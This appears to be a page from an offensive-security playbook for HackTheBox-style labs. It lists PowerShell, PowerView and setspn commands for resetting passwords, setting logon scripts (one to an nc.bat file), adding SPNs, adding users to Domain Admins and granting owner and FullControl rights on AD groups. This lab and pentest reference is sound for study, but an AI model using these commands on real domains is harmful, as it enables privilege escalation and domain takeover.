🏴‍☠️
PlayBook
  • 🎄Active Directory Checklist
  • 👩‍✈️Active Directory Commands
  • ⛓️Scenarios
    • Allowed To Delegate
    • Ansible Vault found
    • You have found an Azure sync sql server and have access
    • Backup Operator SeBackupPrivilege dump ntds.dit
    • Bypass AMSI
    • Certificate Authority create certificate request
    • Certificate Authority Vulnerable Cert
    • Certificate Found
    • Check connectivity with ping
    • Debug Python
    • Decode Strings
    • Defender Outbound Connection
    • Defender remove definitions
    • Deleted AD Object
    • Deserialization Payloads
    • dig enumeration
    • DnsAdmin PrivEsc
    • DomainDump analysys
    • Files found
    • Evil Winrm Kerberos
    • Find ipv6 Ipv6 Port Scanning
    • Find Write to Share NTLM Theft
    • Force auth back to yourself
    • Forward from host Enable Ip Forwarding Kali
    • GPP Groups.xml
    • Grep email from complex content
    • Icacls protect binary from system
    • install dacledit.py
    • Invoke WebRequest vhost
    • Jenkins Found
    • Kerberos Auth required
    • Overview
    • Get Laps passwords
    • ldapmodify to update AD
    • LibreOffice Reverse Shell macro
    • lsass.dmp
    • Offline Sam dump
    • Powershell Oneliners
    • Port 135 MSRPC
    • RBCD GenericAll Computer
    • ReadGSMAPassword
    • Reset password with mimikatz
    • Shadow Credentials
    • Sign Powershell script
    • SMTP Server Found
    • SOCAT to redirect ports
    • System on DC TGT Delegation
    • Take ownership of files and set permissions
    • TightVnc Registry Password
    • WinRM requires ssl
    • WriteDACL Rights
    • AD Allowed to change owner
    • Add AD DNS entry Scripted Outbound Connection Found
Powered by GitBook
On this page
  • setadpassword
  • setadattribute
  • AddAdGroupMember
  • SetAdObjectOwner
  • AddACLRights

Active Directory Commands

AD functions performed in different ways.

setadpassword

# MS AD Module
Set-ADAccountPassword -Identity smith -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)

setadattribute

# MS AD Module
Set-ADUser maria -scriptpath "C:\\programdata\\pc.bat"
Set-ADUser ShriyaB -replace @{'extensionAttribute1' = 'demo text'}
Set-ADUser -Identity maria -ServicePrincipalNames @{Add='MSSQLSvc/object.local:1433'}

# MS setspn.exe
setspn -a MSSQLSvc/object.local:1433 object.local\maria

# Powerview.ps1 Module
Set-DomainObject -Identity maria -SET @{scriptpath = "C:\\programdata\\nc.bat"}

AddAdGroupMember

# MS AD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members maria

# Powerview.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

# apt install samba
net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb

SetAdObjectOwner

# MS AD Module
$user = new-object system.security.principal.ntaccount("htb.local\tom")
Get-ADGroup -filter 'name -like "Backup Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'

AddACLRights

# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$ace = New-Object Security.AccessControl.ActiveDirectoryAccessRule('htb.local\Backup_Admins','FullControl');$acl.AddAccessRule($ace);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Backup_Admins" -PrincipalIdentity claire -Rights All
PreviousActive Directory ChecklistNextScenarios

Last updated 10 months ago

👩‍✈️